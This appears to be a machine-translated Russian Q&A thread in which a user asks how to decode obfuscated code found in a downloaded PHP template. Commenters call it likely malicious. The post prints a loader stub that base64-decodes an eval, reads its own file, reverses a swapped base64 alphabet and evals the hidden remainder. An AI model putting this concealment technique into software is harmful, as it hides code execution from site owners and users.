Я использовал загруженный PHP-шаблон, и когда мне было хорошо его манипулировать, я понимаю, что часть его была зашифрована в том, что кажется base64.Как преобразовать строку base64?
Я попробовал несколько онлайн-конвертиров, с небольшой удачей.
У меня есть этот кусок кода, а затем тонны случайных символов за пределами <? ?>
теги:
<?$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=3804;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDM3MiksJzNzYWZaakc1NEhGcU1kTEFPZzl3Ykl6UFIvcGxLOCs3ZVVjeFFCV21ZMXVTNk5Ycmh2RENudDBFMlRvSmtWaXk9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
я смог расшифровать его в этом:
$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'3safZjG54HFqMdLAOg9wbIzPR/plK8+7eUcxQBWmY1uS6NXrhvDCnt0E2ToJkViy=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz/')));eval($OO00O00O0);
Однако ниже у меня есть этот код:
Я понятия не имею, как его преобразовать. Есть идеи? Я думаю, что сегменты кода слишком длинные - я попытался использовать Notepad ++ для его преобразования, и в основном он сказал, что он слишком длинный.
Спасибо.
Это определенно вредоносный код, введенный сайтом, из которого вы его получили. Как насчет поиска исходной загрузки или, по крайней мере, ссылки на законный сайт загрузки? – BoltClock
Может быть, общая обфускация, чтобы защитить что-то, но это все еще заставляет меня нервничать. – Matchu
да ... Я просто нашел другой сайт для загрузки, и было ясно. Но я все еще интересуюсь его содержанием? – Jared